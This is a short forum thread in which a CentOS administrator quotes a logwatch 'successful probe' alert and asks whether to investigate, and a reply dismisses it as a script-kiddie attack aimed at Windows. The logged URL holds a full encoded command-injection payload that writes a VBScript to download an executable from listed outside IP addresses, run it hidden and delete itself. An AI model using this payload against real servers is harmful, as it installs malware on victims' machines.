Successful probe detected

newbie14 · 11-11-2014, 09:42 PM

I run my logwatch and found this one line in it. I am running centos 6.5 it looks to me more of a window attack do I need to do any digging on this ?

A total of 1 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):

/?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%2 2Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DAr ray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.1 96.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3D true%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsO bject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Op en+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChan ge%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datedif f%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf +xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+ then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.S tream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.S aveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%2 8%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222 .vbs.} HTTP Response 200

dijetlo · 11-12-2014, 05:43 AM

Quote:

do I need to do any digging on this ?

It's a script kiddie looking for a sucker (You were right about windows). If you leave the site up long enough and it becomes popular, it will happen a couple thousand times... a day. If you did manage to trace it to the source, what you'd probably find is a moderately bright 12 year old who lacks parental affection and guidance, so you tell me. Is that worth your time?